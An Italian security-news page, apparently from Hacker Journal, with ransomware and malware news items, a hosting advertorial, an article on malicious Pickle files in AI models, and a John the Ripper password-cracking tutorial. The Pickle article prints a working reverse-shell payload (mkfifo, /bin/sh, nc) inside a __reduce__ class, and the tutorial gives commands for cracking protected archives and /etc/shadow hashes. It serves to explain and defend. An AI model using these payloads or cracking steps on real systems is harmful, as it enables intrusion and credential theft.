Leak
News
L’evoluzione dei ransomware
Aumenta la minaccia di RansomHub, che in Italia è responsabile del 30% di tutte le vittime, mentre Lockbit registra un declino operativo. Le nuove minacce si focalizzano sul furto di dati
L’ultimo rapporto di Check Point Research (CPR) evidenzia che il ransomware rimane la principale minaccia informatica. Un nuovo protagonista, RansomHub, sta crescendo rapidamente nel panorama del ransomware, operando come Ransomware-as-a-Service (RaaS) e rappresentando il 19% degli attacchi a settembre 2024. Questo segnala un cambiamento significativo nel mondo dei criminali informatici. Nel contempo, Lockbit, una volta dominante, ha visto un calo significativo, essendo responsabile solo del 5% delle nuove vittime, molte delle quali derivano da attacchi precedenti. Il rapporto sottolinea una transizione nell’ecosistema del ransomware, con nuovi attori che utilizzano tattiche avanzate come l’estorsione dei dati e la crittografia remota, mettendo alla prova le difese di sicurezza tradizionali in vari settori. Viene inoltre evidenziato che i settori più colpiti dai ransomware sono la produzione industriale e l’istruzione, specialmente in Nord America.
Nel dettaglio
In sintesi l’ultimo rapporto di Check Point Research (CPR) evidenzia:
- L’ascesa di RansomHub: dalla sua nascita nel febbraio 2024, RansomHub è cresciuto rapidamente, prendendo di mira aziende con sede negli Stati Uniti, comprese realtà di rilievo nel settore sanitario, nonostante la sua politica dichiarata di evitare organizzazioni non profit e ospedali.
- Il declino di Lockbit: un tempo dominante, Lockbit rappresenta ora solo il 5% delle vittime. Molte di queste sono state riciclate da attacchi precedenti, il che suggerisce che la scala degli affiliati del gruppo è diminuita in modo significativo.
- L’evoluzione di Meow Ransomware: allontanandosi dalle tradizionali tattiche di crittografia, Meow si concentra ora sul furto di dati e sull’estorsione, riflettendo la tendenza più ampia verso strategie di ransomware non basate sulla crittografia.
- Impatto nei settori: l’industria manifatturiera rimane il settore più bersagliato, subito seguito dall’istruzione. Le organizzazioni sanitarie continuano a essere prese di mira, nonostante le dichiarazioni pubbliche di alcuni gruppi contro gli attacchi a tali istituzioni.
- Impatto globale. L’impatto di RansomHub è stato avvertito a livello globale, ma la concentrazione degli attacchi in Nord America rimane elevata, con il 48% delle vittime negli Stati Uniti.
- In Italia: nel nostro Paese il gruppo RansomHub è responsabile del 30% di tutte le vittime di ransomware, mentre Lockbit, nonostante il netto declino sta ancora mietendo vittime. Sono i settori della produzione industriale e dei beni e servizi di consumo i più colpiti, con l’80% delle vittime.
News
Gamer sotto attacco hacker
Identificata una nuova campagna malevola che inganna gli utenti Windows con falsi CAPTCHA e messaggi di errore del browser
Un CAPTCHA è una funzione di sicurezza utilizzata su siti Web e app per distinguere tra utenti reali e bot. Recentemente, ci sono stati attacchi che hanno distribuito il malware Lumma utilizzando CAPTCHA falsi, principalmente colpendo i gamer. Gli utenti venivano indotti a cliccare su un banner che li reindirizzava a una falsa pagina CAPTCHA, dove venivano istruiti a scaricare Lumma. Cliccando su “Non sono un robot”, veniva copiato un comando PowerShell criptato negli appunti del PC, che gli utenti dovevano incollare e eseguire, scaricando così il malware. Lumma cercava file relativi a criptovalute, cookie e dati dei password manager, e visitava siti di e-commerce per aumentare le visualizzazioni e il guadagno economico degli hacker.
In una nuova ondata di attacchi, i ricercatori Kaspersky hanno identificato un altro schema dove un messaggio di errore finto stile Chrome sostituiva il CAPTCHA. Anche in questo caso, veniva richiesto di copiare un comando PowerShell per scaricare il malware. Questa nuova ondata prende di mira non solo i gamer, ma anche altri utenti attraverso servizi di file-sharing, applicazioni Web, portali di bookmaker, pagine di contenuti per adulti, community di appassionati di anime e altri canali. Gli aggressori utilizzano anche il Trojan Amadey, che ruba credenziali dai browser e dai portafogli di criptovalute, cattura screenshot e ottiene credenziali per i servizi di accesso da remoto. Per ulteriori informazioni visita Securelist.
Leggi anche: “Kaspersky protegge la posta elettronica”
*illustrazione articolo progettata da SecureList
Articoli
Cervelli biologici sotto sale
Se fino a qualche anno fa tutti dovevano mettere le mani su una blockchain, ormai la nuova novità è l’intelligenza artificiale, in particolare i modelli generativi. In realtà la tecnologia non è così nuova: l’intelligenza artificiale esiste, sostanzialmente, da quando esistono i computer. Persino le reti neurali generative non sono una cosa particolarmente nuova. Il motivo per cui hanno avuto un improvviso successo è che sono finalmente diventate abbastanza efficienti da poterci fare davvero qualcosa. Il problema di simulare un cervello biologico è sempre stato l’enorme numero di operazioni da svolgere, soprattutto per l’allenamento della rete neurale, e procedendo sequenzialmente come fa una CPU ci vuole troppo tempo. Ma, da alcuni anni, le GPU hanno raggiunto un grado di sviluppo per cui ogni volta che ne viene rilasciata una nuova generazione (ogni 2 anni, circa) riesce a eseguire almeno 20 o 30 volte il numero di operazioni parallele di quella precedente. Questo permette oggi l’allenamento di reti neurali con decine di miliardi di neuroni in un tempo ragionevolmente breve (misurabile in ore, che varia a seconda dei casi), invece di impiegare anni, anche usando delle schede grafiche “consumer”. Naturalmente si tratta pur sempre di oggetti costosi, da alcune migliaia di euro, ma è un investimento tutto sommato abbordabile. Soprattutto per le aziende, che non vedono l’ora di appiccicare il bollino “made with AI” ai loro prodotti.
C’è in realtà un’altra cosa che, soprattutto nell’ultimo anno, ha dato un forte impulso proprio ai modelli generativi, cioè i modelli di rete neurale allenati per generare dei contenuti (immagini, musica, e testi). E questa cosa, come spesso capita, è la filosofia open source. Le principali aziende che hanno investito in questa tecnologia hanno, infatti, capito che il modo migliore per continuare a innovare è invogliare sviluppatori e appassionati da tutto il mondo a collaborare con nuove idee. È in questa logica che una piattaforma come HuggingFace ha trovato il proprio successo: sulla sua community è possibile pubblicare i propri modelli di rete neurale, provarli, e scaricare quelli di altri utenti. Questo permette a chiunque di non dover partire da capo, ma di prendere un modello preesistente e poi allenarlo con i propri dati, per adattarlo alle proprie necessità.
Naturalmente, alla fine si tratta in buona parte di un grosso “repository”, dal quale scaricare modelli per l’IA, un po’ come GitHub è un grosso contenitore in cui chiunque può caricare qualsiasi cosa. Sta all’utente assicurarsi di scaricare solo software fidato, invece di installare sul proprio sistema il primo malware che capita. E questo vale anche per i modelli IA.
Tanti numeri in fila per uno
È molto importante capire che, semplificando un po’, alla fine un “modello” di IA è una collezione di “pesi”, cioè una sfilza di numeri che stabilisce come siano collegati tra loro i neuroni della rete. Cambiando i pesi, la rete neurale si comporta in modo diverso. È meno prevedibile del cambiare una riga di codice in un programma tradizionale ma, alla fine dei conti, non è altro che un algoritmo che esegue operazioni sulla CPU (o sulla GPU, ma l’inferenza funziona bene anche su CPU). Essendo molto complesso e poco prevedibile, è improbabile (seppure non impossibile), che qualcuno possa realizzare un malware cambiando a mano i pesi di un modello. Almeno al giorno d’oggi.
Ma non è tutto qui: c’è un dettaglio importante del meccanismo di memorizzazione e condivisione dei modelli per Python, il linguaggio di programmazione più diffuso per l’intelligenza artificiale. Un dettaglio che può offrire a un malintenzionato la possibilità di eseguire direttamente comandi sul sistema su cui viene caricato il modello, fino a prenderne il controllo remoto. Hugging Face supporta i principali motori per AI basati su Python, in particolare TensorFlow e PyTorch. I modelli caricati su HF sono degli archivi che contengono diversi file. Uno di questi è il config.json, che contiene le informazioni necessarie per configurare il motore (per esempio PyTorch) con la corretta struttura prevista della rete neurale che si vuole creare. Un altro file importante è il modello vero e proprio, il set dei pesi della rete neurale, che viene memorizzato nel formato Pickle.
Pickle è un “serializzatore” per oggetti Python. Il modello, infatti, non è altro che un array multidimensionale, e per scriverlo su un file bisogna mettere in serie tutti i vari numeri. Sostanzialmente, un po’ come la prospettiva è uno strumento per rappresentare su un foglio degli oggetti tridimensionali. Pickle è un formato binario piuttosto flessibile, si possono serializzare non solo oggetti “statici” come gli array, ma anche intere funzioni: all’interno del file vengono infatti scritte delle istruzioni in una sorta di bytecode, che è molto più efficiente per il caricamento nella RAM rispetto a leggere da un file JSON oppure all’interpretazione di codice Python. Per esempio, un semplice array monodimensionale si può serializzare così:
pickled = pickle.dumps([‘pickle’, ‘me’, 1, 2, 3])
E il bytecode Pickle risultante è questo:
0: \x80 PROTO 4
2: \x95 FRAME 25
11: ] EMPTY_LIST
12: \x94 MEMOIZE (as 0)
13: ( MARK
14: \x8c SHORT_BINUNICODE ‘pickle’
22: \x94 MEMOIZE (as 1)
23: \x8c SHORT_BINUNICODE ‘me’
27: \x94 MEMOIZE (as 2)
28: K BININT1 1
30: K BININT1 2
32: K BININT1 3
34: e APPENDS (MARK at 13)
35: . STOP
Per un array così semplice sembra uno spreco, ma in realtà per oggetti molto più grandi (i modelli AI pesano spesso molti GigaByte) questo meccanismo rende molto più efficiente il caricamento. Questo però significa che in un file Pickle è possibile inserire qualunque tipo di istruzione, eventualmente anche codice malevolo. Questa non è di per sé una vulnerabilità, è solo una caratteristica di questo formato. La vulnerabilità sta nel comportamento degli utenti: bisogna capire che Pickle è un formato binario, difficile da “disassemblare”, e quindi i modelli per AI devono essere trattati come delle “blackbox”. Cioè, devono essere considerati come sempre potenzialmente pericolosi, e bisogna scaricarli solo da fonti sicure, esattamente come si farebbe per un programma binario. Bisogna, insomma, sempre ricordare che si sta eseguendo un software sul proprio sistema, quindi è necessario essere sicuri che questo non faccia nulla di malevolo. Infatti, inserire degli shellcode in un file Pickle è estremamente semplice:
import pickle
import base64
import os
class RCE:
def __reduce__(self):
cmd = (‘rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | ‘
‘/bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f’)
return os.system, (cmd,)
if __name__ == ‘__main__’:
pickled = pickle.dumps(RCE())
Che poi viene tradotto nel file pkl più o meno in questo modo:
0: \x80 PROTO 4
[…]
376: R REDUCE
377: q BINPUT 37
379: X BINUNICODE ‘ignore’
390: q BINPUT 38
392: c GLOBAL ‘posix system’
406: q BINPUT 39
408: X BINUNICODE “rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f”
474: q BINPUT 40
476: \x85 TUPLE1
477: q BINPUT 41
479: R REDUCE
480: q BINPUT 42
482: u SETITEMS (MARK at 33)
Quello che stiamo serializzando non è semplicemente la stringa del comando shell da eseguire, ma proprio la chiamata alla funzione os.system, quindi Pickle quando esegue il bytecode finisce per lanciare direttamente il comando sulla shell di sistema. A essere inserito nel file Pickle è infatti proprio il codice della funzione os.system se scriviamo:
return os.system()
la funzione viene eseguita e otteniamo solo il suo output.
Se invece scriviamo:
return os.system
otteniamo un puntamento alla funzione stessa, pronta per essere eseguita in un secondo momento. E quel momento arriva quando il Pickle viene deserializzato e caricato in memoria. I ricercatori di Wiz, società di sicurezza informatica, hanno provato a prendere addirittura un modello realmente funzionante, GPT2, e aggiungere delle istruzioni alla fine, proprio per eseguire dei comandi sulla shell. E funziona perfettamente, senza nemmeno provocare errori durante il caricamento nella rete neurale di PyTorch. Questo significa che l’utente che scarica e esegue il modello sul proprio PC o server non si accorge nemmeno di quello che sta succedendo: dal suo punto di vista, il modello linguistico funziona correttamente.
Entità della vulnerabilità
Visto il gran numero di utenti e aziende che provano a utilizzare reti neurali generative, e visto che i modelli Pickle per PyTorch sono di fatto il principale standard in questo campo, il pericolo è piuttosto diffuso. Ma è importante ricordare che non tutti i modelli disponibili su HuggingFace sono malevoli. In particolare, non lo sono di certo quelli prodotti da grandi aziende o da community open source. Sicuramente, il fatto che siano binari rende difficile persino per i gestori di Hugging Face scansionarli alla ricerca di malware. E, considerando anche il fatto che i modelli generativi vengono tipicamente, utilizzati su macchine (fisiche o virtuali) piuttosto potenti, c’è il rischio che qualche malintenzionato possa mettere in circolare un modello che gli offre delle shell remote, per ritrovarsi così con una grossa botnet al suo comando.
La soluzione
Essendo questa possibilità di inserire chiamate di sistema dentro un file Pickle, una normale caratteristica del formato, non c’è una vera soluzione. L’unico modo per essere protetti è una catena di fiducia tra tutti i vari passaggi, dal primo autore del modello a chi lo ha integrato allenandolo con altri dataset. Spesso, infatti, si trovano versioni “personalizzate” di modelli pubblicamente disponibili, più adatte a qualche particolare contesto (per esempio, allenate con documenti medici, oppure sportivi). È spesso questi modelli vengono rielaborati e integrati a loro volta. Ma basta che uno di questi “intermediari” non sia affidabile per rendere potenzialmente insicuro il modello finale. Bisogna ripensare ai tempi in cui si scaricavano eseguibili crackati da eMule: quante volte è capitato di provare a eseguire l’ultima versione di Photoshop, solo per accorgersi che in realtà (nella migliore delle ipotesi) era uno spyware che farciva il browser di banner e popup, magari inviando anche email di spam a tutti i contatti? Quando utilizziamo un software senza conoscerne la provenienza dobbiamo sempre mettere in conto la possibilità che chi ce lo ha condiviso possa averci inserito un malware. Un modo per, letteralmente, contenere i potenziali danni è la containerizzazione. Se, infatti, PyTorch e il modello vengono caricati dentro un container a se stante, separato dal resto delle applicazioni che lo andranno a utilizzare, è possibile limitare le risorse che potrà utilizzare, eventualmente impedirne l’accesso a internet (evitando shell remote), e soprattutto evitare un accesso diretto a file sensibili (che verranno passati al momento via API e tenuti in memoria solo per il tempo di elaborazione).
A cura di Luca Tringali
Leggi anche: “La cybersecurity nell’era dell’IA“
News
Gli attacchi arrivano via Telegram
Il malware, diffuso tramite la nota app di messaggistica, è stato progettato per rubare dati sensibili, come password, e prendere il controllo dei dispositivi degli utenti per scopi di spionaggio
Una recente campagna di attacchi informatici, collegata al gruppo APT noto come DeathStalker, ha cercato di infettare vittime nei settori del trading e del fintech con il malware DarkMe, un remote access Trojan (RAT). Gli attacchi, osservati da Kaspersky, hanno colpito più di 20 Paesi in Europa, Asia, America Latina e Medio Oriente. Gli aggressori hanno probabilmente utilizzato canali Telegram specializzati per distribuire file dannosi nascosti in archivi RAR o ZIP. Questi file contenevano eseguibili pericolosi (.LNK, .com, .cmd) che, una volta eseguiti, installavano il malware DarkMe, consentendo ai criminali di rubare informazioni ed eseguire comandi remoti.
I dettagli dell’attacco
Gli aggressori hanno usato Telegram per distribuire il malware e hanno migliorato le misure di sicurezza operativa e di pulizia post-compromissione. Dopo l’installazione del malware DarkMe, i file di distribuzione venivano rimossi per evitare il rilevamento e l’analisi. DeathStalker, attivo dal 2012 e noto anche come Deceptikons, è un gruppo di cyber-mercenari specializzati in hacking e intelligence finanziaria. Il loro obiettivo principale è la raccolta di informazioni commerciali, finanziarie e personali, principalmente per clienti aziendali. Prendono di mira piccole e medie imprese, società finanziarie, fintech, studi legali e, occasionalmente, enti governativi. DeathStalker evita di rubare fondi, rafforzando l’ipotesi che si tratti di un’organizzazione di intelligence privata. Inoltre, cerca di eludere l’attribuzione delle proprie attività imitando altri gruppi APT e utilizzando false segnalazioni.
Leggi anche: “Il Trojan che spaventa le banche”
*illustrazione articolo progettata da Freepik
News
Il trojan che spaventa le banche
Grandoreiro è la nuova minaccia che ha preso di mira più di 1.700 istituzioni finanziarie e 276 portafogli di criptovalute in 45 Paesi e territori, espandendo il proprio raggio d’azione anche in Asia e Africa
Nonostante l’arresto di alcuni operatori chiave all’inizio del 2024, il trojan bancario Grandoreiro continua a essere utilizzato in nuove campagne, specialmente in Messico, coinvolgendo circa 30 banche. Kaspersky ha scoperto una nuova versione “light” del malware, che rimane una delle minacce più attive a livello globale, responsabile di circa il 5% degli attacchi con trojan bancari rilevati quest’anno.
Nonostante l’azione dell’INTERPOL, il codice del trojan è stato suddiviso in versioni più piccole, permettendo ai criminali di proseguire gli attacchi. Tra le nuove tattiche adottate dal malware, c’è la simulazione del comportamento del mouse e una tecnica di crittografia avanzata chiamata Ciphertext Stealing (CTS). Attivo dal 2016, Grandoreiro ha preso di mira oltre 1.700 istituzioni finanziarie e 276 portafogli di criptovalute in 45 Paesi, espandendo il suo raggio d’azione anche in Asia e Africa. Per ulteriori informazioni è possibile consultare il report su Securelist.
Leggi anche: “Kaspersky protegge la posta elettronica”
*illustrazione articolo progettata da Securelist
Articoli
Come migliorare la velocità del sito WordPress con un hosting ottimizzato
La nostra è l’epoca digitale per eccellenza. Ciò significa che la maggior parte di noi non solo usa internet come utente, ma anche e soprattutto per spirito imprenditoriale. E chi gestisce o intende aprire un sito WordPress non può sottovalutare un aspetto in particolare: la velocità.
Premessa: la velocità influenza l’esperienza del sito a 360°. Non solo migliora il tempo di caricamento, ma dà la possibilità agli utenti di navigare sul sito senza intoppi. Cosa fanno gli utenti quando il sito carica in modo lento? Ne trovano un altro.
C’è un modo, però, per migliorare questo aspetto: l’hosting ottimizzato. Questo servizio, appositamente progettato, offre prestazioni elevate per i siti WordPress. Un esempio concreto è l’hosting di Serverplan, che non solo garantisce tempi di caricamento rapidi, ma integra anche un nuovo sitebuilder AI, incluso in alcuni piani. Questo strumento permette di creare e personalizzare il proprio sito in modo semplice e intuitivo, sfruttando l’intelligenza artificiale per ottimizzare automaticamente la struttura e le prestazioni del sito, senza richiedere competenze tecniche avanzate.
Visita questa pagina per scoprire le soluzioni di hosting WordPress offerte da Serverplan e il nuovo sitebuilder AI, ideale per migliorare la tua presenza online con un sito veloce ed efficiente.
Perché la velocità del sito è importante?
Per chi gestisce un progetto online, la velocità di caricamento di un sito web ne determina il successo stesso: alcuni dei motivi per cui è tanto essenziale dedicare attenzione a questo aspetto li abbiamo già elencati.
Come anticipato, un sito web lento è a dir poco frustrante per gli utenti e aumenta nettamente il tasso di abbandono. L’obiettivo è di offrire un’esperienza fluida e piacevole, così da incoraggiarli a rimanere sulla piattaforma ed esplorare i contenuti, con un ritorno importante sul coinvolgimento e sulla fidelizzazione.
Non solo: la velocità è tra i fattori di ranking utilizzati dai motori di ricerca come Google per valutare le prestazioni di un sito. Se non carica bene, sicuramente possono esserci delle ripercussioni in termini di visibilità nei risultati di ricerca e posizionamento organico.
L’hosting influenza la velocità del sito
Prima di tutto, l’hosting influenza non solo la velocità del sito, ma anche le prestazioni stesse. Pertanto, propendere per una soluzione ottimizzata significa credere davvero nel proprio progetto e investire al meglio.
Con un hosting di qualità, si vanno a ridurre i tempi di caricamento delle pagine e molti fornitori come Serverplan si impegnano per fare la differenza per i propri clienti.
Ci sono, nello specifico, dei fattori che influenzano la velocità del sito, ovvero la localizzazione dei server, l’uso di Content Delivery Network (CDN) e la capacità di uptime.
Naturalmente, il supporto tecnico è un ulteriore punto di riferimento, perché, nel momento in cui si verificano problemi al sito, dobbiamo essere assolutamente certi di intervenire nel minor tempo possibile.
La scelta dell’hosting giusto fa sempre la differenza
Le opzioni a nostra disposizione al giorno d’oggi sono molteplici: internet è un mondo (davvero) vasto; quindi, abbiamo la possibilità di valutare diversi fornitori di hosting.
Ciò che non dobbiamo mai dimenticare è di valutare le risorse e le prestazioni offerte dal provider: dobbiamo essere certi che possano soddisfare le nostre esigenze attuali e future del sito.
Per fare un esempio concreto: il sito può crescere nel tempo – si spera! – quindi sapere di poter offrire un servizio costante e veloce nel tempo è molto importante per gli imprenditori.
Altri criteri da non sottovalutare mai? Sicurezza, backup e, come anticipato, il supporto tecnico: con un hosting ottimizzato, navigare sul proprio sito non è mai stato così facile.
Articoli
John The Ripper: lo scardina tutto!
Ecco come funziona lo strumento che facilita il cracking delle password da file ZIP, RAR, PDF e… forse anche del pinguino!
Ormai lo sappiamo: John the Ripper è un cracker di password gratuito e open source, che consente ai professionisti della sicurezza di decifrare una vasta gamma di password, indipendentemente dal fatto che siano crittografate o protette da codici di autenticazione. È uno strumento incluso nei repository predefiniti di molte distribuzioni Linux, tra cui Ubuntu e Debian, ed è installato di default nella maggior parte delle distribuzioni di penetration test, come Kali Linux e BlackArch Linux. Ma se la distribuzione Linux non lo integra, per installarlo si parte dal seguente comando:
$ apt install John
Mentre, se si adopera un computer Mac, è possibile procedere con l’installazione digitando da una finestra di terminale:
$ brew install john
È possibile installare il software anche su Windows: puntare il browser su https://www.openwall.com/john ed effettuare il download dello ZIP a 64 bit dei binari Microsoft Windows (a oggi 1.9.0-jumbo-1 64-bit Windows binaries.zip), quindi estrarre il contenuto dell’archivio. Basterà poi aprire il prompt dei comandi e spostarsi nella cartella scompattata per poter lanciare il comando John.
MODALITÀ DI CRACKING
John The Ripper utilizza una serie di tecniche sofisticate per decifrare gli hash delle password. Il principale metodo d’attacco impiegato è quello detto attacco a dizionario, in cui vengono processate una serie di parole predefinite o comuni, spesso estratte da wordlist gratuite e aggiornate o personalizzate dall’utente. Questo approccio mira a trovare corrispondenze esatte tra le parole del dizionario e gli hash delle password. Poiché molte persone continuano a riutilizzare le stesse password e non le modificano dopo una violazione di sicurezza, tali attacchi stanno diventando sempre più efficaci! Questo perché, in seguito a una nuova violazione, le credenziali compromesse vengono aggiunte da hacker o aspiranti tali ai più blasonati dizionari, accessibili online. Kali Linux fornisce già diversi eccellenti dizionari di password, il più utilizzato è Rockyou.txt, un semplice file di testo contenente un elenco di password comunemente utilizzate e trapelate durante diverse violazioni dei dati, altre risorse sono disponibili in repository online, per esempio su GitHub.
Oltre a operare in modalità Single Crack, può essere utilizzato anche in modalità Incremental Mode, eseguibile con il comando:
john –incremental hash.txt
In questa modalità per individuare la password vengono provate tutte le possibili combinazioni di caratteri. L’External mode consente, invece, all’utente di usare delle funzioni personalizzate scritte ad hoc, per esempio in linguaggio C.
Utilizzo responsabile del software
L’impiego di John the Ripper, così come di qualsiasi altro strumento di cracking delle password, può costituire un’attività sia legale che illegale, a seconda del contesto e dell’intento dell’utilizzatore. È fondamentale che l’utente sia consapevole e rispetti appieno le normative vigenti nel proprio paese o giurisdizione in materia di sicurezza informatica e privacy. In tal senso, prima di avvalersi di tali strumenti, è necessario ottenere il consenso esplicito e l’autorizzazione legale da parte dei titolari delle risorse informatiche coinvolte, nonché rispettare scrupolosamente le policy in tema di sicurezza dei dati. Nel caso in cui sorgano dubbi circa la legalità di determinate attività di cracking delle password, è vivamente consigliabile ricorrere alla consulenza di un esperto legale specializzato in diritto informatico, al fine di valutare attentamente la situazione e ricevere le necessarie indicazioni e chiarimenti in merito. Solo attraverso un approccio etico e conforme alla normativa vigente sarà possibile utilizzare questi strumenti in modo responsabile e legalmente corretto.
IN PRATICA
COSÌ CRACKANO LE PASSWORD DEI FILE ZIP, RAR E PDF
Come i pirati usano John The Ripper e un tool di supporto per craccare i file protetti da password.
LO ZIP È PROTETTO
Supponiamo l’hacker abbia recuperato un nostro file ZIP protetto dalla password “cielo1234”; ogniqualvolta egli proverà ad accedere al contenuto del file, il sistema gli chiederà la password di accesso; il malintenzionato non demorde e usa John The Ripper per individuarla.
ZIP2JOHN E RAR2JOHN
Per creare l’hash da far elaborare a John The Ripper, l’hacker ricorre al tool zip2john. Nello specifico, dalla sua distro Kali lancia il comando sudo zip2john fileziprotetto.zip > hash-hj.txt (Invio). In pochi secondi il sistema genererà il file hash-hj.txt. Per i file .rar l’hacker avvierà il comando rar2john.
IN AZIONE
Il malintenzionato può ora ricorrere alla potenza di John The Ripper per estrapolare la password di accesso allo ZIP. Per farlo proverà, per esempio, un attacco a dizionario con il comando john –format=zip hash-hj.txt –wordlist=/usr/share/wordlists/rockyou.txt (Invio).
LA PASSWORD È SERVITA!
Con il comando è stato indicato a JTR di utilizzare il dizionario rockyou.txt (presente di default nella distribuzione Kali Linux, andrà solo scompattato essendo uno ZIP) per craccare la password. Dopo qualche minuto, il tool indicherà la password individuata, in questo caso “cielo1234”.
E SE C’ È UN PDF?
Anche nel caso di un PDF protetto da password, John The Ripper può scardinare la protezione, in questo caso il malfattore ricorre a un tool simile a zip2john o rar2john, nello specifico lancia il comando pdf2john, ad esempio pdf2john filepdfprotetto.pdf > hash-hj-pdf.txt (Invio).
ET VOILÀ
A questo punto John The Ripper può completare il lavoro, supponendo sempre un attacco a dizionario viene impartito il comando john –format=pdf hash-hj.pdf.txt –wordlist=1000000-password-seclists.txt e ottenere dopo qualche minuto la password. Notate l’utilizzo, a scopo dimostrativo, di un diverso dizionario da rockyou.
TESTIAMO LA ROBUSTEZZA DELLE PASSWORD
John non è solo utile agli hacker, può anche essere impiegato da esperti di sicurezza per valutare l’efficacia delle password usate in Linux
DOVE SONO NASCOSTE LE PASSWORD?
Le password Linux criptate sono salvate nei percorsi /etc/passwd (contiene info su username, user id, descrizione dell’account etc) ed /etc/shadow, che memorizza l’hash delle password, la data di scadenza e dell’ultimo cambio password effettuato e altre informazioni.
INDICHIAMO I FILE DA ANALIZZARE
Il comando unshadow è un’utility utilizzata su Linux per combinare i file /etc/passwd e /etc/shadow al fine di preparare i dati delle password per ulteriori operazioni o analisi. In questo caso per fornirle a John: unshadow /etc/passwd /etc/shadow > pwdlinux.txt.
PREPARIAMO IL FILE HASH
Lanciando ora il commando john –format=crypt –wordlist=/usr/share/wordlists/rockyou.txt pwdlinux.txt, il tool proverà a individuare le password, adoperando il dizionario rockyou.txt, di tutti gli utenti contenuti nel file precedentemente creato: pwdlinux.txt.
MOSTRIAMO LE PASSWORD
L’operazione può richiedere diversi minuti. Invece del dizionario rockyou si può adoperare qualunque altro dizionario, oppure adoperare John The Ripper sfruttando qualche altra modalità di utilizzo di cui abbiamo accennato in questo (speriamo gradito) approfondimento.
Leggi anche: “Rubate 10 miliardi di password“
-
News3 anni ago
Hacker Journal 280
-
News7 anni ago
Abbonati ad Hacker Journal!
-
Articoli2 anni ago
Parrot Security OS: Linux all’italiana- La distro superblindata
-
Articoli3 anni ago
Guida: Come accedere al Dark Web in modo Anonimo
-
Articoli6 anni ago
Superare i firewall
-
News5 anni ago
Le migliori Hacker Girl di tutto il mondo
-
Articoli5 anni ago
Come Scoprire password Wi-Fi con il nuovo attacco su WPA / WPA2
-
News7 anni ago
Accademia Hacker Journal